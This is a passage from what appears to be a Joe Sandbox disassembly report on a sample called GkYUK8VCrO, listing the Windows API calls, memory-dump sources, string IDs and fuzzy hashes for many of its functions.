                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00778,?,00000001), ref: 00B0172A
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B0173C
                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00778,?,00000001), ref: 00B01755
                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00778,?,00000001), ref: 00B01767
                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B00778,?,00000001), ref: 00B017AC
                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B00778,?,00000001), ref: 00B017C1
                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B00778,?,00000001), ref: 00B017CC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                • String ID:
                                • API String ID: 2156557900-0
                                • Opcode ID: 0ddaae985890d6411523dec00959281e919e6329cba7fb4c39561b2cf85f99c9
                                • Instruction ID: 0f2431fcc3f60bb9ad1f82356faeaed698c677912b1e0a417757b4c7892175fa
                                • Opcode Fuzzy Hash: 0ddaae985890d6411523dec00959281e919e6329cba7fb4c39561b2cf85f99c9
                                • Instruction Fuzzy Hash: F931AEB5640204ABEB269F58DD84F793BF9EB19755F1044A8F800872E0DFB89D40CB60
                                APIs
                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AAFC06
                                • OleUninitialize.OLE32(?,00000000), ref: 00AAFCA5
                                • UnregisterHotKey.USER32(?), ref: 00AAFDFC
                                • DestroyWindow.USER32(?), ref: 00AE4A00
                                • FreeLibrary.KERNEL32(?), ref: 00AE4A65
                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AE4A92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                • String ID: close all
                                • API String ID: 469580280-3243417748
                                • Opcode ID: f1adcbee9ac144b4be1292a9f05852c450e61a187a3fc9b90916f94c2d8fa1c9
                                • Instruction ID: 343b7d7cd286431a83037edf22380c00cb7ff5d5e4f03a542eff68c0c303fd01
                                • Opcode Fuzzy Hash: f1adcbee9ac144b4be1292a9f05852c450e61a187a3fc9b90916f94c2d8fa1c9
                                • Instruction Fuzzy Hash: FDA14C30701212CFCB29EF55C995E69F778AF09750F1542BDE80AAB2A2DB30AD16CF54
                                APIs
                                • EnumChildWindows.USER32(?,00AFAA64), ref: 00AFA9A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ChildEnumWindows
                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                • API String ID: 3555792229-1603158881
                                • Opcode ID: 0fa0d10df2241d23833753fe036c01409d6c847ee3cc4af69e35c6ca64b1f88c
                                • Instruction ID: 5bb9ad5d376d0f29c92e960037c27d56454040a07a1346c2695112b5ee1b4a6d
                                • Opcode Fuzzy Hash: 0fa0d10df2241d23833753fe036c01409d6c847ee3cc4af69e35c6ca64b1f88c
                                • Instruction Fuzzy Hash: EC91A3B1A0020AEADB18DFB0C581FF9FBB4BF14340F518169E99EA7141DB706A59CB91
                                APIs
                                • SetWindowLongW.USER32(?,000000EB), ref: 00AA2EAE
                                  • Part of subcall function 00AA1DB3: GetClientRect.USER32(?,?), ref: 00AA1DDC
                                  • Part of subcall function 00AA1DB3: GetWindowRect.USER32(?,?), ref: 00AA1E1D
                                  • Part of subcall function 00AA1DB3: ScreenToClient.USER32(?,?), ref: 00AA1E45
                                • GetDC.USER32 ref: 00ADCF82
                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ADCF95
                                • SelectObject.GDI32(00000000,00000000), ref: 00ADCFA3
                                • SelectObject.GDI32(00000000,00000000), ref: 00ADCFB8
                                • ReleaseDC.USER32(?,00000000), ref: 00ADCFC0
                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ADD04B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                • String ID: U
                                • API String ID: 4009187628-3372436214
                                • Opcode ID: 34551ad51af17d1a21995fb6a4443f77ad583d3069e06b5cf5e3506df9abea4f
                                • Instruction ID: 310a08697ffa09e05685b9929ddaaada447867b05370052a881c601ea81cbdd5
                                • Opcode Fuzzy Hash: 34551ad51af17d1a21995fb6a4443f77ad583d3069e06b5cf5e3506df9abea4f
                                • Instruction Fuzzy Hash: EA718131500206DFCF319F68C884AFA7BB6FF49364F14426AED565B2A6C7318C92DB60
                                APIs
                                  • Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623
                                  • Part of subcall function 00AA2344: GetCursorPos.USER32(?), ref: 00AA2357
                                  • Part of subcall function 00AA2344: ScreenToClient.USER32(00B667B0,?), ref: 00AA2374
                                  • Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000001), ref: 00AA2399
                                  • Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000002), ref: 00AA23A7
                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B2C2E4
                                • ImageList_EndDrag.COMCTL32 ref: 00B2C2EA
                                • ReleaseCapture.USER32 ref: 00B2C2F0
                                • SetWindowTextW.USER32(?,00000000), ref: 00B2C39A
                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B2C3AD
                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B2C48F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                • API String ID: 1924731296-2107944366
                                • Opcode ID: f2d72e5a7669f04014c7f33b6a5ec5015e33588aaa70e8742b0d814c6a215fae
                                • Instruction ID: dc6e9b32950f1fa36ad1bb3881f4e961253073d0fa5dd5f41bc71023e2782af3
                                • Opcode Fuzzy Hash: f2d72e5a7669f04014c7f33b6a5ec5015e33588aaa70e8742b0d814c6a215fae
                                • Instruction Fuzzy Hash: E651A930204301AFDB10EF24D995F6F7BE5EB88310F00896DF9958B2E1DB74A959CB52
                                APIs
                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B2F910), ref: 00B1903D
                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B2F910), ref: 00B19071
                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B191EB
                                • SysFreeString.OLEAUT32(?), ref: 00B19215
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                • String ID:
                                • API String ID: 560350794-0
                                • Opcode ID: 8119b3a9484b68e18ed85947bf4cf9cbfb5013c4371ff8c1e0f0e8cd9b356ce6
                                • Instruction ID: 53bcc9f2cc6b14b3f93d116667147576488e0a209e2b9c465735903cffdd9e5e
                                • Opcode Fuzzy Hash: 8119b3a9484b68e18ed85947bf4cf9cbfb5013c4371ff8c1e0f0e8cd9b356ce6
                                • Instruction Fuzzy Hash: B4F13A71A00209EFDB04DF94C898EEEB7B9FF49714F508499F515AB290CB31AD86CB50
                                APIs
                                • _memset.LIBCMT ref: 00B1F9C9
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FB5C
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FB80
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FBC0
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FBE2
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B1FD5E
                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B1FD90
                                • CloseHandle.KERNEL32(?), ref: 00B1FDBF
                                • CloseHandle.KERNEL32(?), ref: 00B1FE36
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                • String ID:
                                • API String ID: 4090791747-0
                                • Opcode ID: 72c7b5ea5220535c07f9a24d3263d0eacd9e1ca53b18e7047a8085c50a15aafd
                                • Instruction ID: 3421975fb3e4a3ba083e54314b9f17eeb1f698346c30079af6ef0e67a28bc1ba
                                • Opcode Fuzzy Hash: 72c7b5ea5220535c07f9a24d3263d0eacd9e1ca53b18e7047a8085c50a15aafd
                                • Instruction Fuzzy Hash: E3E18F312042029FC714EF24C991ABBBBE5EF85350F5485ADF8999B2A2DB31DC45CB52
                                APIs
                                  • Part of subcall function 00B048AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B038D3,?), ref: 00B048C7
                                  • Part of subcall function 00B048AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B038D3,?), ref: 00B048E0
                                  • Part of subcall function 00B04CD3: GetFileAttributesW.KERNEL32(?,00B03947), ref: 00B04CD4
                                • lstrcmpiW.KERNEL32(?,?), ref: 00B04FE2
                                • _wcscmp.LIBCMT ref: 00B04FFC
                                • MoveFileW.KERNEL32(?,?), ref: 00B05017
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                • String ID:
                                • API String ID: 793581249-0
                                • Opcode ID: bb70da91fe14a17e78a6df31d019fe63b13898691351e81efcc9e514b6c1b170
                                • Instruction ID: d6446abee8e5594a0a83da23f99061790d3b8a60ca34cc15c8417814a5e80cf4
                                • Opcode Fuzzy Hash: bb70da91fe14a17e78a6df31d019fe63b13898691351e81efcc9e514b6c1b170
                                • Instruction Fuzzy Hash: 4E5156B24087855BC734DB60D881ADFB7ECDF85340F00496EB289D3191EF74A6488B66
                                APIs
                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B2896E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: InvalidateRect
                                • String ID:
                                • API String ID: 634782764-0
                                • Opcode ID: 484b879390a1ac94c4e728ef33c50aed95121cf63efd3aeb8f8155470d96f8f7
                                • Instruction ID: 8791601c34b53ca8bbcbec4ddad9bd75d10ec49734dd9c631b13d7f7639be30e
                                • Opcode Fuzzy Hash: 484b879390a1ac94c4e728ef33c50aed95121cf63efd3aeb8f8155470d96f8f7
                                • Instruction Fuzzy Hash: 3E51B230501224BBDF309F28EC85BA93BE5FB06310F6041A2F519EB5E1DF71A9908B91
                                APIs
                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ADC547
                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ADC569
                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ADC581
                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ADC59F
                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ADC5C0
                                • DestroyIcon.USER32(00000000), ref: 00ADC5CF
                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ADC5EC
                                • DestroyIcon.USER32(?), ref: 00ADC5FB
                                  • Part of subcall function 00B2A71E: DeleteObject.GDI32(00000000), ref: 00B2A757
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                • String ID:
                                • API String ID: 2819616528-0
                                • Opcode ID: decbe83a02c53fc0cf23b726145fb66464a51b670bc2cf531bfbc5c0b7aadd72
                                • Instruction ID: 35902236cb4e9af4182ad60e4207301f9a038288a448f2817a27beb10f04d3d5
                                • Opcode Fuzzy Hash: decbe83a02c53fc0cf23b726145fb66464a51b670bc2cf531bfbc5c0b7aadd72
                                • Instruction Fuzzy Hash: 36513B70A40206AFDB24DF28DC45FAA7BB5EB55760F104529F902972E0DBB0ED91DB60
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E0C
                                • HeapAlloc.KERNEL32(00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E13
                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AF8A84,00000B00,?,?), ref: 00AF8E28
                                • GetCurrentProcess.KERNEL32(?,00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E30
                                • DuplicateHandle.KERNEL32(00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E33
                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AF8A84,00000B00,?,?), ref: 00AF8E43
                                • GetCurrentProcess.KERNEL32(00AF8A84,00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E4B
                                • DuplicateHandle.KERNEL32(00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E4E
                                • CreateThread.KERNEL32(00000000,00000000,00AF8E74,00000000,00000000,00000000), ref: 00AF8E68
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                • String ID:
                                • API String ID: 1957940570-0
                                • Opcode ID: 2680f989e7d6f98bc4c9dc01b40132a3a6d599560fb79bbeb81f62a761362eaf
                                • Instruction ID: f372b5402eb7c7aafa9f0b8d2159586adbde2aab563f2b4b68f99cab4553b51d
                                • Opcode Fuzzy Hash: 2680f989e7d6f98bc4c9dc01b40132a3a6d599560fb79bbeb81f62a761362eaf
                                • Instruction Fuzzy Hash: 4101BBB5640309FFEB20ABA5DD4EF6B3BACEB89711F404421FA05DB1A1CA749811CB20
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Variant$ClearInit$_memset
                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                • API String ID: 2862541840-625585964
                                • Opcode ID: ce927bd28bc8b49c228594b97b6d65199bce088db28287e162888f6f9bb8d603
                                • Instruction ID: 2685707e89ab42b9623e8e9ba8ff86fb040b702a2c65dcf27706cc6ec222b76c
                                • Opcode Fuzzy Hash: ce927bd28bc8b49c228594b97b6d65199bce088db28287e162888f6f9bb8d603
                                • Instruction Fuzzy Hash: 3591CE71A00249ABDF24DFA5C894FEEBBF8EF45710F108199F515AB290D7709A85CFA0
                                APIs
                                  • Part of subcall function 00AF7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?,?,00AF799D), ref: 00AF766F
                                  • Part of subcall function 00AF7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?), ref: 00AF768A
                                  • Part of subcall function 00AF7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?), ref: 00AF7698
                                  • Part of subcall function 00AF7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?), ref: 00AF76A8
                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B19B1B
                                • _memset.LIBCMT ref: 00B19B28
                                • _memset.LIBCMT ref: 00B19C6B
                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00B19C97
                                • CoTaskMemFree.OLE32(?), ref: 00B19CA2
                                Strings
                                • NULL Pointer assignment, xrefs: 00B19CF0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                • String ID: NULL Pointer assignment
                                • API String ID: 1300414916-2785691316
                                • Opcode ID: c2faf81bf125e898768a64686e14f4ca9fe256aea4056921d519f5c90ce10d58
                                • Instruction ID: 22db9982f49973b5f5caafe8354f2b444fe179e8f98c93c3f83216b740e2391d
                                • Opcode Fuzzy Hash: c2faf81bf125e898768a64686e14f4ca9fe256aea4056921d519f5c90ce10d58
                                • Instruction Fuzzy Hash: 53913871D00219EBDF10DFA4DD94ADEBBB8EF09710F20816AF519A7281DB319A45CFA0
                                APIs
                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B27093
                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B270A7
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B270C1
                                • _wcscat.LIBCMT ref: 00B2711C
                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B27133
                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B27161
                                Strings
                                Memory Dump Source
